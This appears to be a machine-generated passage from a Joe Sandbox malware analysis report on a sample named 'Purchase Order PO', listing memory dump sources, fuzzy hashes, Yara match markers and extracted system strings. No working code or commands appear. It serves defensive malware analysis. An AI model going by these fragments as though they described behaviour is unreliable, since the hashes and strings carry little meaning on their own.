                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: de4cea45087e8eb098885a3d1628a7d8792e21668173593d30d4b1d5e553fa5e
                                                                                                                            • Instruction ID: 315ba3eb5bfc6914ee65e3f9f5a35d5550e61d90ec5974e52ea87efc7e1b68d7
                                                                                                                            • Opcode Fuzzy Hash: de4cea45087e8eb098885a3d1628a7d8792e21668173593d30d4b1d5e553fa5e
                                                                                                                            • Instruction Fuzzy Hash: AC90026121140042D10471584408706008597E1201F56C012E2154654CC52D8D615225
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 037b48db4360d927138a691e3e36bced7ff043f19b1d8ff53a86ba42fa899228
                                                                                                                            • Instruction ID: 8bc61be0e4101ddb89b5e29731219726cc763f99d62ed75a515f0d11380b6f25
                                                                                                                            • Opcode Fuzzy Hash: 037b48db4360d927138a691e3e36bced7ff043f19b1d8ff53a86ba42fa899228
                                                                                                                            • Instruction Fuzzy Hash: 9C90027120140402D14071584408746004597D0301F56C011E5064654EC65D8ED56765
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 96b7c75a20c83707c91a839ba83fc3e46b8894876a8778983d6e02ff186b9584
                                                                                                                            • Instruction ID: 42563a78d922166bbb1d714a00e7785dcd292483d6819e1cbf5368e5645d500e
                                                                                                                            • Opcode Fuzzy Hash: 96b7c75a20c83707c91a839ba83fc3e46b8894876a8778983d6e02ff186b9584
                                                                                                                            • Instruction Fuzzy Hash: ED90022160140502D10171584408616004A97D0241F96C022E1024655ECA298A92A231
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a28debb057385e6406769110b79c07af2351daf96bc3ab37d357d0c1aa8fe2e3
                                                                                                                            • Instruction ID: 9b9b32dd0f6e5eb38f344a47b1908f0149a162c2863f6a21c698a616b0d8eb2e
                                                                                                                            • Opcode Fuzzy Hash: a28debb057385e6406769110b79c07af2351daf96bc3ab37d357d0c1aa8fe2e3
                                                                                                                            • Instruction Fuzzy Hash: 5490026120180403D14075584808607004597D0302F56C011E2064655ECA2D8D516235
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 41950c3107acb014d1da71447b1eaddd12f22b5702b3d9b358542fec2790db9a
                                                                                                                            • Instruction ID: db002d59569c7f50ad4871133554446a0d5f630283194786235b8183967f783e
                                                                                                                            • Opcode Fuzzy Hash: 41950c3107acb014d1da71447b1eaddd12f22b5702b3d9b358542fec2790db9a
                                                                                                                            • Instruction Fuzzy Hash: FD90022130140402D102715844186060049D7D1345F96C012E1424655DC6298A53A232
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 88f66d437ff36b07433e532cad552a300b8d35ff065b6b17fe7bde66f9f0dd9d
                                                                                                                            • Instruction ID: 04391bb5f9ea4a361678e69d17230c28ec0518a57e49cfe2df26e85ef790a13a
                                                                                                                            • Opcode Fuzzy Hash: 88f66d437ff36b07433e532cad552a300b8d35ff065b6b17fe7bde66f9f0dd9d
                                                                                                                            • Instruction Fuzzy Hash: 7590022124140802D140715884187070046D7D0601F56C011E0024654DC61A8A6567B1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 36ad150a8cae86dd6fc9817db99a963e7dc1c29477283e180aaa603241177ccf
                                                                                                                            • Instruction ID: f636358054738b42a1009a51b9eadfc49a93d68d9d890b1709b9e05902393a31
                                                                                                                            • Opcode Fuzzy Hash: 36ad150a8cae86dd6fc9817db99a963e7dc1c29477283e180aaa603241177ccf
                                                                                                                            • Instruction Fuzzy Hash: F890022120184442D14072584808B0F414597E1202F96C019E4156654CC91989555721
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 78096a5309d4bb9cb3be4b46394a37749f4553986bd8db7c5f68de80227086ce
                                                                                                                            • Instruction ID: 015c381c6f8380ae54e9dc07706465262541d2d6cac03e8df1fb030e90ab237a
                                                                                                                            • Opcode Fuzzy Hash: 78096a5309d4bb9cb3be4b46394a37749f4553986bd8db7c5f68de80227086ce
                                                                                                                            • Instruction Fuzzy Hash: 8490022124545102D150715C44086164045B7E0201F56C021E0814694DC55989556321
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 4d7ae23415528ecfab5efcf2c0203fb68f165ec40be96899545ddc6cb2a2fd26
                                                                                                                            • Instruction ID: 9bec3cd577146bdd5d394aa9f8a9f4f40713550779e633691f4735c08c6e0c53
                                                                                                                            • Opcode Fuzzy Hash: 4d7ae23415528ecfab5efcf2c0203fb68f165ec40be96899545ddc6cb2a2fd26
                                                                                                                            • Instruction Fuzzy Hash: 5B90023120240142954072585808A4E414597E1302F96D415E0015654CC91889615321
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: e1637c81144afdfa1d080affd9ebb758477085790794b8ef3d4017d007eef61f
                                                                                                                            • Instruction ID: e394f97be6b781cd325ab439101e06a3c63e40e20668afadefeebe0588602288
                                                                                                                            • Opcode Fuzzy Hash: e1637c81144afdfa1d080affd9ebb758477085790794b8ef3d4017d007eef61f
                                                                                                                            • Instruction Fuzzy Hash: 7790023520140402D51071585808646008697D0301F56D411E0424658DC65889A1A221
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                            • Instruction ID: 8cbda16b8bf9915ea72239d69fb845b0b684b4ed37a8807dcca28932c100cf67
                                                                                                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ___swprintf_l
                                                                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                            • API String ID: 48624451-2108815105
                                                                                                                            • Opcode ID: 10b088c588dc159492e5fcbfe8247693bcfe7e5cabfee2044d40ad1b1eddfc36
                                                                                                                            • Instruction ID: 4a3780a2cfee48c15480a02ff5f91dc97bdbe2a5464f2746e4dd47feb989a933
                                                                                                                            • Opcode Fuzzy Hash: 10b088c588dc159492e5fcbfe8247693bcfe7e5cabfee2044d40ad1b1eddfc36
                                                                                                                            • Instruction Fuzzy Hash: 0051FAB5A046167FDB25DBACC990A7EFBF8BB08240714826AF466D7641D374DE40C7E0
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ___swprintf_l
                                                                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                            • API String ID: 48624451-2108815105
                                                                                                                            • Opcode ID: adb77dd494444f6339afad9c4700030f44120d167db9a9dbd4a1fbd937e8e9b4
                                                                                                                            • Instruction ID: 463ba3a0670ceb459719603416b785260858afd9ad75f9138f7516eb23d3b350
                                                                                                                            • Opcode Fuzzy Hash: adb77dd494444f6339afad9c4700030f44120d167db9a9dbd4a1fbd937e8e9b4
                                                                                                                            • Instruction Fuzzy Hash: 6151F375A00646AFDF28DEACD99097EBBF8EF44200B04C4D9F596C7641E7B4DA00A7A0
                                                                                                                            Strings
                                                                                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01B046FC
                                                                                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01B04742
                                                                                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01B04725
                                                                                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 01B04787
                                                                                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01B04655
                                                                                                                            • ExecuteOptions, xrefs: 01B046A0
                                                                                                                            • Execute=1, xrefs: 01B04713
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                            • API String ID: 0-484625025
                                                                                                                            • Opcode ID: 0e7220c87ed2babcf0c5a7dd30ea63e0e77b96b8dfb4d7d7b9e52793f5c49723
                                                                                                                            • Instruction ID: 3d17cbd15d7ee795d6985dd04cbbd453947c68d32eea1c4065585b2d7fdca786
                                                                                                                            • Opcode Fuzzy Hash: 0e7220c87ed2babcf0c5a7dd30ea63e0e77b96b8dfb4d7d7b9e52793f5c49723
                                                                                                                            • Instruction Fuzzy Hash: 4851E431600219BAEF25ABE9DD85BBE7BB8FB14B00F0400EDE605A7191EB719A45CF50
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __aulldvrm
                                                                                                                            • String ID: +$-$0$0
                                                                                                                            • API String ID: 1302938615-699404926
                                                                                                                            • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                            • Instruction ID: e9b5ee28e5381c4bac61a49149e7bddc21fb230f294a0a80f837346d071c1879
                                                                                                                            • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                            • Instruction Fuzzy Hash: D081AF70E06A499FEF258F6CC8517FEBBB1AF46360F1E4159D863A7291C73489408B71
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ___swprintf_l
                                                                                                                            • String ID: %%%u$[$]:%u
                                                                                                                            • API String ID: 48624451-2819853543
                                                                                                                            • Opcode ID: c480d061f790595793d86a8de7c79482d8cc313ed42ae9711a78e442725c0189
                                                                                                                            • Instruction ID: b7020f156436d39a0f1fc2da162041b921fb7ba1ec00009d7ce50215b5d5dc9e
                                                                                                                            • Opcode Fuzzy Hash: c480d061f790595793d86a8de7c79482d8cc313ed42ae9711a78e442725c0189
                                                                                                                            • Instruction Fuzzy Hash: 0721537AA00119ABDB15EF7AD945AAFBBF8EF54650F044196F905E3200E730DA01EBA1
                                                                                                                            Strings
                                                                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 01B002E7
                                                                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 01B002BD
                                                                                                                            • RTL: Re-Waiting, xrefs: 01B0031E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                            • API String ID: 0-2474120054
                                                                                                                            • Opcode ID: cb57353d320112732ae778b55bcb9f09a64863992cbf441b1e2075b605de57d8
                                                                                                                            • Instruction ID: 8abc30f3000856694469bcc0d1ae78a3d3557d4dfe794d1ae4edaa0a0c721b12
                                                                                                                            • Opcode Fuzzy Hash: cb57353d320112732ae778b55bcb9f09a64863992cbf441b1e2075b605de57d8
                                                                                                                            • Instruction Fuzzy Hash: 13E1CF306047819FD72ADF28C884B6ABBE4FB48754F180A9DF5A5CB2E2D774D944CB42
                                                                                                                            Strings
                                                                                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01B07B7F
                                                                                                                            • RTL: Resource at %p, xrefs: 01B07B8E
                                                                                                                            • RTL: Re-Waiting, xrefs: 01B07BAC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                            • API String ID: 0-871070163
                                                                                                                            • Opcode ID: c6b83f50d965416b258cffcc07171c37926d65ca583ba1d41daff96e9663c067
                                                                                                                            • Instruction ID: f4a6deb0de122375a92f8ce0401a38a843009115d508d3d5b2b282b4f473ccfa
                                                                                                                            • Opcode Fuzzy Hash: c6b83f50d965416b258cffcc07171c37926d65ca583ba1d41daff96e9663c067
                                                                                                                            • Instruction Fuzzy Hash: 6C41D3317007039FD725DE29C851B66BBE5EB98B10F100A5DF99AD7780DB32E4058BA1
                                                                                                                            APIs
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01B0728C
                                                                                                                            Strings
                                                                                                                            • RTL: Resource at %p, xrefs: 01B072A3
                                                                                                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01B07294
                                                                                                                            • RTL: Re-Waiting, xrefs: 01B072C1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                            • API String ID: 885266447-605551621
                                                                                                                            • Opcode ID: 7e7c441c578453b13c28789d22e51dcde3df3e6bf28b7bb312980075e005ce6b
                                                                                                                            • Instruction ID: 398983347a64cfacce8bda9a27fdffd5d00efec4938ec79a720545c7ee4baa54
                                                                                                                            • Opcode Fuzzy Hash: 7e7c441c578453b13c28789d22e51dcde3df3e6bf28b7bb312980075e005ce6b
                                                                                                                            • Instruction Fuzzy Hash: 16412031600206ABCB25CE29CC42F66FBA5FB55B10F10065CF996AB280DB31F806CBE0
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ___swprintf_l
                                                                                                                            • String ID: %%%u$]:%u
                                                                                                                            • API String ID: 48624451-3050659472
                                                                                                                            • Opcode ID: a44ada77cba436a0ea89cb80ab2949dd842d7dcb3743333a9316335ca0f9e332
                                                                                                                            • Instruction ID: 8ed39626c23e292dae9e9262e8d7964884400224983bf409ce75a166b90b00f9
                                                                                                                            • Opcode Fuzzy Hash: a44ada77cba436a0ea89cb80ab2949dd842d7dcb3743333a9316335ca0f9e332
                                                                                                                            • Instruction Fuzzy Hash: F1315472A00619AFDB24DF2DDD84BEEB7F8EF54610F4445D5F949E3240EB309A44ABA0
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __aulldvrm
                                                                                                                            • String ID: +$-
                                                                                                                            • API String ID: 1302938615-2137968064
                                                                                                                            • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                            • Instruction ID: af78a784faefd9e39737c1d6b7d9b17b200cd585ea50a47c783c18aa50626322
                                                                                                                            • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                            • Instruction Fuzzy Hash: F791B571E00A169ADB38CFADC8816BEBBB1FF48728F54455AE957E72C0DB348940CB51
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $$@
                                                                                                                            • API String ID: 0-1194432280
                                                                                                                            • Opcode ID: dee97e2d675ece554c248ee58425a1deae48fbf1d9bc9fec7af81ef20ee37a4e
                                                                                                                            • Instruction ID: 74715a3fd59259087b22e01697b8fab372ea7ae0d369d77cdf755a346b400b4f
                                                                                                                            • Opcode Fuzzy Hash: dee97e2d675ece554c248ee58425a1deae48fbf1d9bc9fec7af81ef20ee37a4e
                                                                                                                            • Instruction Fuzzy Hash: 7E810C71D002699BDB75DB94CD44BEEB7B8AF48754F0441DAEA19B7240E7309E84CFA0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: j$$=$($8^$=$L7$O5$Z$[$[$[5$]$d&$fX$k^$q$sw$y$}$4
                                                                                                                            • API String ID: 0-2360868250
                                                                                                                            • Opcode ID: 07b4afcba548320085603d41395a70a88b48b3e91e702d77237f01df1c52075e
                                                                                                                            • Instruction ID: ffe0e5e9e0b568e5b4fa63f76f4e4dd5f1d2df0ddfc71665d625c2d6e8b379f5
                                                                                                                            • Opcode Fuzzy Hash: 07b4afcba548320085603d41395a70a88b48b3e91e702d77237f01df1c52075e
                                                                                                                            • Instruction Fuzzy Hash: A412E0B4E16229CFEB28CF49C8947EDBBB2BF85308F1481D9D4496B285C7B51A85CF41
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 6$O$S$\$s
                                                                                                                            • API String ID: 0-3854637164
                                                                                                                            • Opcode ID: b7d0034783b993231ae93bba56965397c5b8b96306e4b5aa6429389a8463abe2
                                                                                                                            • Instruction ID: 5d32097e5d9861ef695483a6b5b609aecd35380901b34e62d5c2a51456bd5f84
                                                                                                                            • Opcode Fuzzy Hash: b7d0034783b993231ae93bba56965397c5b8b96306e4b5aa6429389a8463abe2
                                                                                                                            • Instruction Fuzzy Hash: DE51A672D11318AFDF10DFD8DC45EEEB378EF84710F148199ED089A140E7B59A948BA5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: "1$~!
                                                                                                                            • API String ID: 0-4146445991
                                                                                                                            • Opcode ID: 639cc635f774ca0338b75a683a153f6e21b4ced9507b621540147d22da56499b
                                                                                                                            • Instruction ID: 55fd341d0a52541f31f4693fb65b794100e883caab2f612eb3737a0521822a26
                                                                                                                            • Opcode Fuzzy Hash: 639cc635f774ca0338b75a683a153f6e21b4ced9507b621540147d22da56499b
                                                                                                                            • Instruction Fuzzy Hash: 9301D7B6C11219AF8B50EFE8D8419EEBBF8AB18200F14466AD505F6240F7749A448FA1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: "
                                                                                                                            • API String ID: 0-1165748306
                                                                                                                            • Opcode ID: 9a43477422ecfde0ed53a9224819f6ab075015e11c3c32de38f19afbf712c515
                                                                                                                            • Instruction ID: 4ed5262dfbcb1b44f4877eb1f2d3c1c366fc44cfb22359ec0c5db92e480a1a3f
                                                                                                                            • Opcode Fuzzy Hash: 9a43477422ecfde0ed53a9224819f6ab075015e11c3c32de38f19afbf712c515
                                                                                                                            • Instruction Fuzzy Hash: 572130B6D11219AF8B00DFE9D8419EFB7F9FF98210F04466AE915E7204E7709A548BE0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 6r
                                                                                                                            • API String ID: 0-1993249690
                                                                                                                            • Opcode ID: 5a475c1fd64906f5f025767121e17dd43e83d4b976390659b15a8ec84352b1bd
                                                                                                                            • Instruction ID: 1431f0973364b09fe48c64303834dd82f767f55fb713d6bd9f8aa996ae1f80d7
                                                                                                                            • Opcode Fuzzy Hash: 5a475c1fd64906f5f025767121e17dd43e83d4b976390659b15a8ec84352b1bd
                                                                                                                            • Instruction Fuzzy Hash: D1111FB6D1121DAF9B00DFE9D8419EEBBFDEF48210F14456AE909E7200E7759A00CBE1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0f0353a976d93377e610bf09b771834532060c9b4b0aee289e3646305e196795
                                                                                                                            • Instruction ID: 310b3b7c5e11859ef8ed7d92a9c2a614715a7f5cdcd1d3befc0af372c14853e9
                                                                                                                            • Opcode Fuzzy Hash: 0f0353a976d93377e610bf09b771834532060c9b4b0aee289e3646305e196795
                                                                                                                            • Instruction Fuzzy Hash: B641F1B1D11219AFDB04DF99C885AEEBBBCFF49710F10415AFA14E6240E7B59681CBE0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
